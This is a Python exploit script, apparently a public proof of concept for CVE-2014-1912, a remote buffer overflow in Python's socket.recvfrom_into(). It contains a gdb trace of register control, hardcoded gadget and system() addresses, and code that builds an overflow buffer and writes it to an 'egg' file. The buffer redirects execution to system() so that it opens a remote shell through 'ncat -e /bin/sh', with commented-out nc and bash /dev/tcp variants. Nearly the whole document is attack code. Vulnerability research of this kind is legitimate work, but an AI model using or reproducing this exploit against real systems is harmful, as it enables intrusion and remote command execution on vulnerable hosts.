#!/usr/bin/env python ''' # Exploit Title: python socket.recvfrom_into() remote buffer overflow # Date: 21/02/2014 # Exploit Author: @sha0coder # Vendor Homepage: python.org # Version: python2.7 and python3 # Tested on: linux 32bit + python2.7 # CVE : CVE-2014-1912 socket.recvfrom_into() remote buffer overflow Proof of concept by @sha0coder With NX evasion! (gdb) x/i $eip => 0x817bb28: mov eax,DWORD PTR [ebx+0x4] <--- ebx full control => eax full conrol 0x817bb2b: test BYTE PTR [eax+0x55],0x40 0x817bb2f: jne 0x817bb38 --> ... 0x817bb38: mov eax,DWORD PTR [eax+0xa4] <--- eax full control again 0x817bb3e: test eax,eax 0x817bb40: jne 0x817bb58 --> ... 0x817bb58: mov DWORD PTR [esp],ebx <---- ebx points to the beginning of the buffer [trash]||shell cmd[null byte] 0x817bb5b: call eax <--------------------- indirect fucktion call ;) will be redirected to system() ''' import struct def off(o): return struct.pack('L',o) ''' rop = { 'pop eax': off(0x80795ac), 'call eax': off(0x817bb5b), 'xor eax': off(0x8061379), 'mov [eax], edx': off(0x8078cf6), 'xor edx, edx': off(0x80a60d1), } ''' plt = { 'system': off(0x805b7e0), } #addr2null = off(0x11111111) ebx = 0xb7ae7908 # points to the begining of the buff eax = ebx eax2 = ebx+20 padd2 = 'X'*(144) padd1 = 'Y'*(8) #system_command = 'bash -i >& /dev/tcp/ 0>&1' #system_command = 'nc -e /bin/sh 1337' system_command = 'ncat -e /bin/sh 1337' ''' +------------+------------------+ +--------------------+ | | | | | V | | | V ''' buff = 'aaaa' + off(eax) + padd1 + off(ebx) + padd2 + plt['system'] + '||'+system_command+'\x00' # thanks python strings ;) print 'buff sz: %s' % len(buff) open('egg','w').write(buff) print 'egg file generated!!!'